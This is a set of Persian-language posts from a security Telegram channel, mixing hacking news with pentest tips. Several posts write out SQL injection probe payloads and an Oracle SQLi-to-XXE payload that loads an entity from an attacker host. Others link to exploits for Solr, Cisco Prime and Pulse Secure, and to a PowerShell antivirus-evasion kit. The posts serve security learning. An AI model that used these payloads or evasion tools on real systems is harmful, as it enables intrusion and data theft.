Apache Solr RCE via Velocity Template Injection


https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt


#apache
#rce
#exploit


@sec_nerd

استخراج تمامی آدرس های api از angularjs و فایلهای جاوا اسکریپت انگولار

curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u


#web
#pentest
#angular


@sec_nerd

ساخت دندان با استفاده از پرینت سه بعدی!

https://twitter.com/0xAmit/status/1189610151696850944


#shitty_future


@sec_nerd

لیست 3203 کلمه معمول مورد استفاده در APIها
مناسب برای عملیات Fuzzing

https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d

#api
#pentest
#web
#bugbounty


@sec_nerd

محققان Cybereason کمپینی را شناسایی کردند که شرکتهای ارائه دهنده خدمات مخابراتی بزرگ را هدف قرار داده است.
این کمپین توسط گروه هکرهای چینی با کد شناسایی APT10 صورت گرفته و یک حمله ی چند جانبه است.
این حملات از سال ۲۰۱۲ در جریان بوده و با نام Operation Soft Cell شناخته میشود. به نظر میرسد عاملان این حمله به دنبال جزییات تماس های افراد در این زیرساختهای مخابراتی بوده اند.
هکرهای مذکور در هر موج از حمله پس از شناسایی شدن پس از چند ماه اقدام به حمله ی جدید با استفاده از ابزارها و روشهای نوین میکردند.


جزییات بیشتر و شرح فنی این حملات:

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers



#news
#apt10
#telecom


@sec_nerd

قفل (اثر انگشت) واتس اپ بالاخره برای اندروید فعال شد!

engt.co/33fWK8Y

#whatsapp
#android


@sec_nerd

منابع آنالیز بدافزار برای افراد تازه کار

https://github.com/0x4143/malware-gems/blob/master/README.md


#malware
#learning

@sec_nerd

آزمون آسیب پذیری Sql injection در apiها

Always start From : Boolean based >> Time based

{"id":"56456"} - OK
{"id":"56456 AND 1=1#"} -> OK
{"id":"56456 AND 1=2#"} -> ERROR
{"id":"56456 AND sleep(15)#"} -> SLEEP 15 SEC

#api
#web
#pentest
#sqli

@sec_nerd

مجموعه ماشین های مجازی برای تقویت قابلیت های تست نفوذ به وب


https://pastebin.com/dmqmBTwz


#web
#pentest
#lab


@sec_nerd

ایجاد http server برای دسترسی سریعتر به فایلهای روی سرور و برخی آزمون های حملاتی مانند XXE

python 2:
python -m SimpleHTTPServer 80


python 3:
python3 -m http.server 80



#python
#trick


@sec_nerd

تبدیل SQLi به XXE با استفاده از تابع xmltype

id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "https://haxor.com ">%evil;]>'),'/l') from dual)||'



(قبلا به اشتباه xss تایپ شده بود که اصلاح شد)

#sqli
#xxe
#web
#bugbounty
#pentest


@sec_nerd

Powershell based FUD

https://github.com/SpiderMate/Red-Teaming/tree/master/PS-Fud


#ps
#bypass
#av


@sec_nerd

CVE-2019-11510, Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability



#pulse
#network


@sec_nerd

ابزار Osmedeus برای شناسایی و کشف آسیب پذیری بر روی تارگت ها

https://github.com/j3ssie/Osmedeus

#tool
#pentest
#web

@sec_nerd

هکرها در حال استفاده وسیع از آسیب پذیری Bluekeep برای انتشار بدافزار استخراج کننده ارز دیجیتال هستند.
اکسپلویت مذکور توسط شرکتهای بزرگ با موفقیت ایجاد و آزمایش شده اما هنوز بصورت عمومی منتشر نشده است زیرا نزدیک به یک میلیون سیستم آسیب پذیر در برابر این حمله وجود دارد.
با وجود اینکه این آسیب پذیری قابلیت worm سازی را دارد اما اکسپلویت مورد بحث و مورد استفاده در استخراج ارز دیجیتال از نوع worm نیست.


اطلاعات بیشتر:
https://thehackernews.com/2019/11/bluekeep-rdp-vulnerability.html



#new
#bluekeep
#windows
#malware


@sec_nerd

آسیب پذیری اجرای دستور از راه دور بر روی Cisco Prime Infrastructure بدون نیاز به احراز هویت

توضیحات:
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html

اکسپلویت:
https://srcincite.io/pocs/src-2019-0034.py.txt



#network
#cisco
#pentest


@sec_nerd

گروه امنیت اطلاعات

https://t.iss.one/joinchat/Cu-7qUvIA5ULBMsmH9yVzA



@sec_nerd

XSS To Good XSS With ClickJacking on Subdomain Microsoft
https://link.medium.com/4EXo7G8Sk1

#XSS
#web
#BugBounty

@sec_nerd

گوگل سعی دارد خود را به نقطه دستیابی به تمام محتوای وب تبدیل کند. این عمل با سه گامی که شرکت گوگل برداشته است انجام شده:
۱- حذف آدرس های قابل دیدن در کروم با استفاده از origin chip
۲- جریمه وبسایتهایی که از قابلیت google AMP استفاده نمیکنند (گوگل AMP سرویس گوگل برای ساخت و نمایش صفحات وب با سرعت بالا و هماهنگ با دستگاه های مختلف است)
۳- حذف آدرس های وبسایتها از نتایج جستجوی گوگل

https://twitter.com/drybones_5/status/1190694123965210625


#news
#google


@sec_nerd